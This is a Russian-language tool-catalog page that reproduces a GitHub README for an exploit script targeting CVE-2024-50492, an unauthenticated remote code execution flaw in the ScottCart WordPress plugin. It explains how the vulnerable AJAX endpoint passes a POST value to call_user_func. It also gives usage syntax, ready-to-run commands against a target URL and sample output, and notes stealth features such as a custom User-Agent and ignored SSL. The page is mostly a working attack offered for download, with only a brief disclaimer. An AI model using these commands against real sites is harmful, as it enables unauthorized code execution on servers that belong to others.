Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Неавторизованное удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-50492
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Неавторизованное удаленное выполнение кода

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE Exploit

🔥 Эксплойт для ScottCart <= 1.1 - Удалённое выполнение кода без аутентификации
🧑‍💻 Автор: Nxploit – Khaled Alenazi


📌 Описание

Плагин ScottCart для WordPress (версии ≤ 1.1) уязвим к удалённому выполнению кода (RCE).
Это позволяет неаутентифицированным атакующим выполнять произвольные функции PHP на сервере через уязвимый AJAX-эндпоинт.

  • Плагин: ScottCart ≤ 1.1
  • Уязвимость: Внедрение функций без аутентификации → RCE
  • CVE: CVE-2024-50492
  • Оценка CVSS: 9.8 - Критическая

🧠 Как это работает

Плагин регистрирует незащищённое AJAX-действие:

add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Которое выполняет:

call_user_func($_POST['function']);

Позволяя атакующим вызывать любую существующую функцию PHP, например:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← если расширена в модифицированных средах

🚀 Возможности эксплойта

  • ✅ Автоматически отправляет сформированную полезную нагрузку для запуска уязвимого эндпоинта
  • ✅ Позволяет переопределить функцию через аргумент
  • ✅ Полезная нагрузка по умолчанию: phpinfo() для PoC
  • ✅ Сохраняет вывод в файл с временной меткой (например, results_2025-03-26_14-33-01.txt)
  • ✅ Пользовательский User-Agent, обработка ошибок и игнорирование SSL для скрытности

🖥️ Использование

usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Показать это справочное сообщение и выйти
  -u URL, --url URL     Базовый URL цели (например, http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Вызываемая функция (по умолчанию: phpinfo)

💡 Примеры

🔍 Поведение по умолчанию (PoC с phpinfo()):

python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 Вызов внутренней функции плагина:

python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 Пример вывода

[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 И сохранено в: results_2025-03-26_14-33-01.txt


🛡️ Отказ от ответственности

Этот инструмент предназначен только для образовательного и авторизованного тестирования.
Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


💬 Благодарности

  • 💻 Эксплойт: Nxploit – Khaled Alenazi
  • 🛡️ Идентификатор CVE: CVE-2024-50492
Скачать инструмент